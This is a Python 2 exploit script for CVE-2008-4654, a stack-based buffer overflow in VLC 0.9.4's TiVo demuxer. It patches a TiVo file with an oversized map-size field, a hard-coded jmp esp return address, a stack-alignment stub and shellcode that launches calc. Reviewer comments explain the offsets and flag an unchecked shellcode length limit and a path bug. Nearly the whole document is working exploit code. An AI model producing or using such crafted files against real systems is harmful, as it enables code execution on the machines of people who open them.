VLC 0.9.4 Stack-Based Buffer Overflow during TiVo file-format demuxing - discovered by Tobias Klein / CVE-2008-4654
#!/usr/bin/python
#
# VLC 0.9.4 Stack-based Buffer Overflow exploit while demuxing
# TiVo file format as it was described by Tobias Klein in his
# http://www.trapkit.de/advisories/TKADV2008-010.txt
# CVE-2008-4654
#
# Shellcode has no bad-character requirements,
# but must be at most 187 bytes long.
#
# Exploit by Mariusz B.
#
import struct | |
import sys | |
import os | |
# 0x68f0cfad : jmp esp
# {PAGE_EXECUTE_READ} [libqt4_plugin.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
#
# Written little-endian at header offset pos+0x5c by main().  It is a fixed
# gadget address inside one specific build of libqt4_plugin.dll; the
# "ASLR: False, Rebase: False" note above is what makes a hard-coded value
# usable at all -- a module that relocates under ASLR would not be at a
# predictable address.
RETURN_ADDRESS = 0x68f0cfad
# 4-byte TiVo header signature.  main() searches the input for it packed
# big-endian (struct '>I') and uses the match position as the base for every
# patched offset.
TIVO_MAGIC = 0xf5467abd
# Aligns ESP stack pointer
# push esp
# pop eax
# sub ax, 0x180
# mov esp, eax
#
# 8-byte stub that main() places at pos+0x64, immediately before SHELLCODE.
STACK_ALIGN = "\x54\x58\x66\x2d\x80\x01\x8b\xe0"
#
# Shellcode to be used - no bad chars.
# It must be at most 187 characters long!
#
# Below: 112 bytes long CreateProcess("calc")
# source: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
#
# NOTE(review): the 187-byte limit stated above is not enforced anywhere in
# this script; main() writes len(SHELLCODE) bytes unconditionally.
#
SHELLCODE = (
    "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
    "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
    "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
    "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    "\x45\x81\x3e\x43\x72\x65\x61\x75"
    "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
    "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
    "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    "\x6c\x63\x89\xe2\x52\x52\x53\x53"
    "\x53\x53\x53\x53\x52\x53\xff\xd7"
)
def replace(data, start, length, what):
    """Overwrite a slice of *data* in place with the elements of *what*.

    Elements are copied to ``data[start]``, ``data[start + 1]``, ... until
    either *length* elements have been written or *what* is exhausted,
    whichever comes first; a non-positive *length* writes nothing.  *data*
    is mutated and also returned so calls can be chained.

    Raises IndexError (propagated from the sequence) if the target index
    falls outside *data*.
    """
    for offset, value in enumerate(what):
        if offset >= length:
            break
        data[start + offset] = value
    return data
def main(argv):
    """Patch a TiVo (.ty) file into a proof-of-concept for CVE-2008-4654.

    Python 2 only: the ``print`` statements below are syntax errors under
    Python 3, and ``str(struct.pack(...))`` relies on Python 2 ``str`` being
    a byte string.

    Args:
        argv: ``sys.argv``; ``argv[1]`` is the path of the input TiVo file.

    Side effects:
        Writes a patched copy next to the input (see ``new_file`` below) and
        prints progress to stdout.

    Exits with status 1 when no path is given or the TiVo magic is not found.
    Raises IndexError (from replace()) if the file is shorter than the
    highest patched offset, pos + 0x64 + len(STACK_ALIGN) + len(SHELLCODE).
    """
    if len(argv) == 1:
        # "Usag" is a typo in the user-facing string; kept as-is here.
        print 'Usag: vlc-exploit.py <tivo-file>'
        sys.exit(1)
    data = bytearray()
    with open(argv[1], 'rb') as f:
        data = bytearray(f.read())
    # Locate the big-endian TiVo signature; every offset below is relative to it.
    pos = data.find(str(struct.pack('>I', TIVO_MAGIC)))
    if pos == -1:
        print '[!] Not a valid TiVo file.'
        sys.exit(1)
    print '[.] Got a valid TiVo file.'
    # Step 1: Replace TiVo's i_map_size variable in order to trigger out of bounds read.
    # This 4-byte big-endian value at pos+20 is the actual trigger; everything
    # after it is payload placement.
    data = replace(data, pos + 20, 4, struct.pack('>I', 0xff))
    # Step 2: Prepare a return address as a JMP ESP
    # RETURN_ADDRESS is stored little-endian (x86) at pos+0x5c, followed by a
    # 4-byte NOP pad at pos+0x60.
    data = replace(data, pos + 0x5c, 4, struct.pack('<I', RETURN_ADDRESS))
    data = replace(data, pos + 0x60, 4, '\x90' * 4)
    #data = replace(data, pos + 0x60, 4, '\xcc' + '\x90' * 3) # DEBUG the shellcode
    # Step 3: Insert a shellcode
    # NOTE(review): the 187-byte limit from the file header is not checked
    # here; len(SHELLCODE) bytes are written regardless.
    print '[+] Writing {} bytes long shellcode...'.format(len(SHELLCODE))
    data = replace(data, pos + 0x64, len(STACK_ALIGN), STACK_ALIGN)
    data = replace(data, pos + 0x64 + len(STACK_ALIGN), len(SHELLCODE), SHELLCODE)
    print '[+] Exploit prepared.'
    # NOTE(review): os.path.splitext(argv[1])[0] already carries the directory
    # part, so joining it with dirname() duplicates that part for relative
    # paths ('dir/x.ty' -> 'dir/dir/x-exploit.ty'); only a bare filename or an
    # absolute path ends up where intended.
    new_file = os.path.join(os.path.dirname(argv[1]), os.path.splitext(argv[1])[0] + '-exploit.ty')
    with open(new_file, 'wb') as f:
        f.write(data)
    print '[+] Prepared file: "{}"'.format(new_file)
if __name__ == '__main__':
    # Script entry point; argument checking and exit codes live in main().
    main(sys.argv)